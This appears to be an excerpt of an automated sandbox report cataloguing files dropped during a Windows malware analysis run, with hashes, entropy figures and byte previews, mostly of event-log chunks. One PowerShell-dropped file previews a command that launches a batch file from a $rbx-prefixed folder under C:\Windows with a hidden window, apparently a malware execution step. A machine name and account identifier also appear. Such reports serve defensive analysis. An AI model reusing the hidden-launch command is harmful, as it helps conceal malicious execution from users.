                                                SSDEEP:384:shL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmIUmxjUmLUmqU:sY7LR
                                                MD5:29F219BC8DD6F9B4D274CCF2D86ED277
                                                SHA1:EB6E9A1C7E994ECE135FC8D1EEF64DA7AB5E7214
                                                SHA-256:E11617EE20F013F6B979BF529CF6648BBC7386F7BFA50328711229A0DE2CAC19
                                                SHA-512:B5F4038905D6CFD84A698D6E52E960DC9E605A7C66085E6ECB5886F52BF24C20DECDE23F412B75DA05B5F5450EB6AA80C5F9B436F0468ACDA6AA4DCE1D35940D
                                                Malicious:false
                                                Preview:ElfChnk......................................1..04...V........................................................................6................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&........................................*..............................................................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.20444044820186183
                                                Encrypted:false
                                                SSDEEP:48:MKdW1rP+yQNRBEZWTENO4bhBkcow/6zk:TNVaO8Mcow/6zk
                                                MD5:DD1B3B82CB152F6FC2121B14EF3A3255
                                                SHA1:A5F3EC17F63EE74FA5129E741DF72B3B8EF15A63
                                                SHA-256:FD1525A6AB0031025B1F75EDACA4109D1625114EC0ABF54D47BB7633922687E9
                                                SHA-512:2C355AEA32B361DADB45329C43345634841F034FA53EABBDDA9F27917C949BA633806E2E84B8D832FE1CF22DCB42B1D70EBE40955394483FAADE33BB5C98047F
                                                Malicious:false
                                                Preview:ElfChnk..............................................W.G.....................................................................y.T................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...............................................................................**.................5a...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.0934111022900845
                                                Encrypted:false
                                                SSDEEP:384:phjivnniDiiuXieuietio0i7riTKhiIViOhin5ibaifiWipiUiKijiTVijiHiBRY:pon6ufC/hCI4MWs8PM9QSp
                                                MD5:C03DC232AFCDF6316B6CC7D1D5266423
                                                SHA1:8B90D640BB1B09E8C61117DE6B00B93CB1FE69A0
                                                SHA-256:198FDBBBC7444C323E7DBFB5B6D5B6AB870587FE7B740A05C22C6821B0508D16
                                                SHA-512:192E77738FC7A6493DFA22C5A56EA01E4A502219756578AE772C4FB0A1074617A21523D1029C6C9DDF15798D0968A0C14C8B723EAB0B91BD01F9967540C04DE9
                                                Malicious:false
                                                Preview:ElfChnk.y...............y....................x...z..D.......................................................................Hu...................#..a.......................=.......................#...................................................................................................f...............?................'......P.......................M...F....................................................................@...................#..................................w#.......'..............**......y........`0.Y...........g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.257054806361608
                                                Encrypted:false
                                                SSDEEP:384:eGhecp/PpohCpPpaLpypDpWpywp7pdKpApWZqhpaepx2p8pEpSpWIN/pTp9EpSiI:hshamoZqP+INFaY9Ha
                                                MD5:8455BBE9A5FAF8DEA263FC999856A576
                                                SHA1:02E83723E5E95B2BB89D97D8B3E4B35D62551F40
                                                SHA-256:1B96AC0C736327A5C41EEBC411133B87A2A1173EBBBA10193B327A4EEA562AB2
                                                SHA-512:3E8B9C8790444ACB44B087B793A26A02C7359449620DD1C8A0A1D140A1BFD34A83827261B835C708E77FEB52F12445DEC79397048D4E7ACDA105461A5B174B25
                                                Malicious:false
                                                Preview:ElfChnk......................................r...t...u?........................................................................................6...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................y...........&........0...........%..........................a!..........!F..........................**..h..............7..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.3930294391437794
                                                Encrypted:false
                                                SSDEEP:768:KcasFsaIa/a4aDaBa5aQa8aFBaOaVaea0aTaPaLaraXavarararajaLa/aParaHS:tF
                                                MD5:183376D4043464940E1EA869DF9F3D8F
                                                SHA1:77B5AC234FBFC3B6CC65B123586D2FD079426E4F
                                                SHA-256:3812F95695BBC3DEE0A47690EBC818494C1E2B14C19872D883A0F24AA550D33A
                                                SHA-512:37FBEDBC77A4848A54A16C450C38DDEE97F5C312BECD050153E9A24FD474213B0E580E0D1C59F3B6D662CF0FD1FCB6B2CE34D3440EC71BA4A9F1864390F2CB77
                                                Malicious:false
                                                Preview:ElfChnk.........@...............@...............h..............................................................................................h...........................=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...........................................A...................................**..P.............."a...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.4157482482643835
                                                Encrypted:false
                                                SSDEEP:384:8haXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJgXJRpXJBgXJQXJBvXJnXJSc:8Q0yUkNYwD8imLEoRfBoYb5GO
                                                MD5:A886E83D1948FFB2BF4A2B744DDCCBD3
                                                SHA1:0074C53E8984FB0024DE0485447D3E1081B34D0B
                                                SHA-256:6DD70CE24E770699A142E13D62B090F64E00CD0A8501FC2D31E0ED5F9DFAB004
                                                SHA-512:3263F89608AEB4140553E587A3946E352391DAAC7DF85ABF0358A39B45103655DAE1DE29616A71142C4BB42FD1C0273F3E3B2F6900CCDE672F36ADBB3F7629D1
                                                Malicious:false
                                                Preview:ElfChnk......................................D...G..B.f......................................................................0.................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........3..................................................C...........................**..............@V.$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.342266575776689
                                                Encrypted:false
                                                SSDEEP:384:Chbm8mJmAwmsmkmtmZjm9mEJmSmSgmMmJmyFmgmPm4mOmdm9mHbkmzm7m6mBmdmv:CA74DcxI1c8PF
                                                MD5:302AE7C3FB3FBC33D19DBFB4CA97D867
                                                SHA1:86165BE8A181F1DE44CC86F75E36890C0379AB94
                                                SHA-256:1183791BE47DD2268E48827BC2B2F8D2F50C6265AF23904E15E35A8A4715B3DB
                                                SHA-512:AEE86973AE3C7844DF4EAA3406ECCF1AD59EF458F1623A35B84246B26C83229441B76C64A2502D2F9EF298DAF450D0069C6180A99B041A1D2B9DAD57B6F8A816
                                                Malicious:false
                                                Preview:ElfChnk......................................6..P8...P\<........................................................................................R.......................z...=...........................................................................................................................f...............?...........................m...................M...F...................................................................&...........;...........+.......................................................**...............21.`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.711346426112008
                                                Encrypted:false
                                                SSDEEP:192:7V7rDiDxFYzDiDPDiDfDiDDDiDxDiDUDiDgDiDsDiDQDiDEDiDYDiDEDiD:7hr2ts2T2z2n2N2w202w2M2Y2E2I2
                                                MD5:F911674F42FFA9096A39B15D79861134
                                                SHA1:14C46673DAB47906E3693ABC048CD0C2FADBECB6
                                                SHA-256:1668A045EF7528D741AAD61574F673D564D9BC7831A57FB6CD4A4D25C3FCA4B5
                                                SHA-512:2341C1145DCD1E714D0A16CFE517CCD8F0BF6F94A45882A4142B2D90B27A1ACD4F4508AF7E49A52B0B0F2E418EEC461EF2CBB0463D48CC48E08E6880A617B442
                                                Malicious:false
                                                Preview:ElfChnk................................................(....................................................................4.KU................T.......................|...=...........................................................................................................................f...............?...........................m...................M...F...............................-...................................&...............................................................................**..............IL..`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 12, DIRTY
                                                Category:dropped
                                                Size (bytes):76184
                                                Entropy (8bit):1.8279381649358473
                                                Encrypted:false
                                                SSDEEP:1536:dSpP9JcY6+g4+Ga6qSpP9JcY6+g4+Ga6:dSpP9JcY6+g4+Ga6qSpP9JcY6+g4+Ga6
                                                MD5:5B461594E7A8CE02FC51594F694DAEF3
                                                SHA1:17304262DE6BCE57CF775403F3244F859B12F445
                                                SHA-256:C26D8D89CCFEA45E5AED03C9D1B915EB389BFA37CFF5842C36E1904307A69640
                                                SHA-512:BCDCE253BE546BA269365401A3BFBD61648047C0151E5E44E510ACD1D42EF7BC5220324ED54E6D80D2253F141FBC9EB1B9451DCFCB7A4D99CD3F851B51C4E0FA
                                                Malicious:false
                                                Preview:ElfFile.....................................................................................................................[...ElfChnk......................................&...)...B......................................................................bj.H................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......n...............................................3...............................**................................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):3.8421011226942205
                                                Encrypted:false
                                                SSDEEP:384:NBh7RucVRDRbR2R3RgRxR5RrGRRrRuRVRERfRzRwRQRoRTyDR6RQR36RMGRPRHRN:NBNzUhK3K
                                                MD5:CBE3EA463793C0C7D5F322FB36092DB3
                                                SHA1:DFDC9C3FF6F3F3F087687057F0D1EE3486BF965B
                                                SHA-256:E0A4B5A04951BE1E30845CEE488F9431FB79B4F9E7A3E0BA2289D58E5DEBBD9F
                                                SHA-512:9367406E3843FBD3B587FF5F97470BD3685818B0BC8AAF25E4163B856F475881A24D6002C8E7147AEE80234D23902C9C187A48593125BE4C1A519BE985E57404
                                                Malicious:false
                                                Preview:ElfChnk.:.......v.......:.......v...............x.....y.....................................................................1..................................F.......|...=.......................................`.......................u...-......................................................f...b..........?.......................`.......A.......G.......M...F.......................................................................................&...........9.......9.......................................**......:.........*_..........^..&........^..~.]i.../.l.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.260359446709512
                                                Encrypted:false
                                                SSDEEP:384:fhRhwhdhP0h9hzehShchawhZh4hhhshphihXhMhxhzhwhohGh5h3hShChWhzhLh4:fmFpkBzBiELmn
                                                MD5:067AD5BE5D9DAC2F9972EA7CCD899B43
                                                SHA1:EDD013A75A95D510CCEBA7DF86938621FA17E518
                                                SHA-256:EE5349F31C79D30F8AB2023451ECC640BD33C7F038ED6951D0F9FF2FE82BA0E7
                                                SHA-512:F2E20C281CD6E14FBDDCE8C89055CF5BC6A3C79E5D65037B269B11F2500E750A15998C9A29365F7D5903E4CF568EA45026E9F340A0318C212E8AD936EA2B3F65
                                                Malicious:false
                                                Preview:ElfChnk.........................................`...........................................................................3i._........................................@...=...........................................................................................................................f...............?...........................m...................M...F...........................................i.......................&.......................................................y.......................**................9.`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.2594795605878295
                                                Encrypted:false
                                                SSDEEP:384:LhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVHV7Vj0V1VXFVq:LyjbPac
                                                MD5:33C02B19501869BF7DF6F6BF1D2E6BF6
                                                SHA1:D90AF4BD50FE734A1E74ACC4E0704FEE1346F8D4
                                                SHA-256:6453729FD9D539566FC7AA3CE013B958C237E0E713AA917444F453C02A96F3BB
                                                SHA-512:B4D4A162E59651477CE87DE756F9DBD7634A206CA7FA83CA61DD73F86CAE343083AFF067A981DE096AAB1AE6997E599397E4851648800B2BCDAA6E5BAC0797A8
                                                Malicious:false
                                                Preview:ElfChnk........."..............."...........h8...9....?......................................................................Z..................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v.......&*..............................................................................**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.222652164441627
                                                Encrypted:false
                                                SSDEEP:384:v9hcBwBuBwB+BwBZwDIBwBoK/oyBwBY/puBwBN0bNoBwByQZBwBY/UUBwBY/5Bw9:FI0bDHrL
                                                MD5:D838A93C3849C253315B1DB18B3FEB4D
                                                SHA1:BC9CC30FE501246AD345EAF05E1EA42F3C9F740E
                                                SHA-256:F98D500A2CD43C26011B7A7CE47A42D9369788D614D21AE63BCC5C8D34AF297B
                                                SHA-512:C710E643CAF2B7C5F9E49A2B27D665512B650AE2489FF7A17A46955F4B38A81ECE885487EC34FADB528B98AA7746D11E4EA4CEFDF4CD6B9EC8557DC943F3DB3B
                                                Malicious:false
                                                Preview:ElfChnk.....................................H;..x>...r)........................................................................\............................................=...........................................................................................................................f...............?...........................m...................M...F...........................o.......................................&...............................................................................**..(...............`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.423183909657457
                                                Encrypted:false
                                                SSDEEP:384:/hGUEBUEYUEQUEhUE8UE5UE5UE8UExUEFUELUEVUEyUEXUEDUEuDUEBUEWUEzUE3:/P7s3NxG9
                                                MD5:718C0E7FA4C2A524A5FF961FEB987C13
                                                SHA1:73CB0C09C67332548F50613AA349E12695C715A2
                                                SHA-256:461F7778DD38ABE30403674C9E34EFF22F91AB7D4C207FB8CD2C4B31773588CC
                                                SHA-512:6A7705597D00B2193F3ECD79CDCD4B6D97DA36B879ECBC2E5F8EA3A8B77D9FA301B14E68BBB9ACBBF72B695DC83E66493F3C4D1DD94B1FC9D0E4ABA787BD853B
                                                Malicious:false
                                                Preview:ElfChnk.....................................0`...a.....r........................................................................................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................................A.......................**.................`...........E!&.........E!.._c..Y..........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):69864
                                                Entropy (8bit):4.43673947502305
                                                Encrypted:false
                                                SSDEEP:384:qoHXZkoRonKodUoHX2oHX1moHXhhoHX5FRSBX2s7NloGMtUxboxMtf4oxMtuyox1:xkoY1i2P5If98FMWRkoY1uh
                                                MD5:57CA84239484AB59941749712FE42E4E
                                                SHA1:335BFFE00580DC02BEE072C0ABB417F286FBC51C
                                                SHA-256:ECA3A216EC776C1EA68B774BEE6DB6AF9820A0D416D3FCE3091D25A82DDAC4E0
                                                SHA-512:4DB5380E1FF8B3D27C07C9A0FF8EB1AAE9AB9267BC114FBDC5BC080E2E7A14DEFDB2C7C1E928D3661B1016E311A2A7C8F37A9EB6FCD7CA2A60CBBAE05926E9BE
                                                Malicious:false
                                                Preview:ElfChnk.........L.......".......m..................._........................................................................,?.........!.......z...s...h...................=...................................................N...............................................w.......<.......................5...................................c...........).......M...Z...:....................M.......S..S...............................V...kc..............................................................C^...7......**......g......................E!V...............................................................F.............!....6.......... .............n@......!.x.......g........M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.e.c.u.r.i.t.y.-.A.u.d.i.t.i.n.g.%..TxT.I..>;.(..S.e.c.u.r.i.t.y....w"B.7......................N...........................................$.N......f.r.o.n.t.d.e.s.k...F.R.O.N.T.D.E.S.K.-.P.C...........M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.u.s.e.r.=.0.2.e.d.r.c.x.t.c.s.a.f.f.e.u.v
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.4174142843031134
                                                Encrypted:false
                                                SSDEEP:384:zFRX2HrBwjhdGqpfv/wP+SvHsX2Imjo6bPwtrQMUU5963XRs+5dXNlZnEi8B98IB:ZSY84iLQraN3HpRAtF
                                                MD5:B16E7F09C9DF10A688C23F22DD9684E0
                                                SHA1:95B26B61C91CC2D5CC4238F3945082B2C91972FE
                                                SHA-256:91FE00F48174741287A7D0147406674C58B01276CDD9730C16A413B3F65B5A65
                                                SHA-512:0B65279EBC03D8B78485FEA762F72AD95C92FB221E637DAA5DFEEBB7F321C04C86E90785F926EBC6D2594811379EDE46951C0EF5D6A3673CE777E6BCEABF0151
                                                Malicious:false
                                                Preview:ElfChnk......................................$...'...T.Q......................................................................5....................s...h...............%...=...................................................N...............................................w.......8.......................M..................................._...........).......M...;...:...........................................................y...........=............%......................&.......................&........ ..**..H.............K...........v..&........v..Tr].4....E.C.......A..7...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....`...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):191624
                                                Entropy (8bit):3.7345642572258706
                                                Encrypted:false
                                                SSDEEP:3072:OXnnkFQ+w8MXnnkFQ+w8+XnnkFQ+w8oXnnkFQ+w86XnnkFQ+w8fXnnkFQ+w8MXnR:OXnnkFQ+w8MXnnkFQ+w8+XnnkFQ+w8oa
                                                MD5:8E35D70FDB81CB899038644C2E4F6A0B
                                                SHA1:4807E48A234AFBE7651F5D0BC41ED62235401B4A
                                                SHA-256:67826F63323409FAA291A605F4137B94E8A6BDDE058B15ABDD977633F576A1A4
                                                SHA-512:9BE659961A77099AD91FED2684DDA0E6DC22746E3EA4D1A0C2B51EED8908D6D991EA60CFEB5D2889B8DB5A880A0473A0BAF4270FA1A8602CAF2C7DA197B5A1D6
                                                Malicious:false
                                                Preview:ElfChnk.....................................h.......k..-.......................................................................G............................................=..........................................................................................................................._...............8...........................f...................M...c...........................v.......................................................................................&...............................**...3............f..........L.-9&.......L.-9...P..K`..$5........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WerFault.exe
                                                File Type:MS Windows registry file, NT/2000 or above
                                                Category:dropped
                                                Size (bytes):1835008
                                                Entropy (8bit):4.41764985251679
                                                Encrypted:false
                                                SSDEEP:6144:Ycifpi6ceLPL9skLmb0mNSWSPtaJG8nAgex285i2MMhA20X4WABlGuNl5+:Ni58NSWIZBk2MM6AFB3o
                                                MD5:3FC30873019E4F5023BE3A347E48D5CD
                                                SHA1:2881DD7D3465E0F8E2362324763EFB26B6C4938B
                                                SHA-256:DA747D9C36F0E0FE106A50AB26BCA0886210C2385B38ABD225CFBC4A52808154
                                                SHA-512:81D722096D61B572E5EB9CCAA933C435F8FC321007144CA2F656A7E795AF12DE2DFD7F82528F3C6984E9CE7AACA67AE38358BD1213501FC02E491B95318122A4
                                                Malicious:false
                                                Preview:regfF...F....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.E_S.................................................................................................................................................................................................................................................................................................................................................Hg........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):85
                                                Entropy (8bit):4.84935141926561
                                                Encrypted:false
                                                SSDEEP:3:jKMFIwpVh+d3LKMP9IdXMfyM9oM3Ky:jKMFIsV8d7Koq01R3Ky
                                                MD5:D8C4F9FD5B972AE487170EA993933179
                                                SHA1:32E61F1DD8A462CEDC6B7A636275363B011ABDA9
                                                SHA-256:728A155A3A8272BB230C121C67CC90A986C11B84504E3902AC4EEDA9D8EC78ED
                                                SHA-512:1F4E7C0C8DC83C0280E77290CF76738D0611FBB9ADBC4D76A7DF4FD2E1EE49F684400E16008ED58D89009D4FE67C456094E9610279B4A20DDAC39038A3F5D4DF
                                                Malicious:false
                                                Preview:Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden ..
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with very long lines (2696), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):2843
                                                Entropy (8bit):5.269035353896471
                                                Encrypted:false
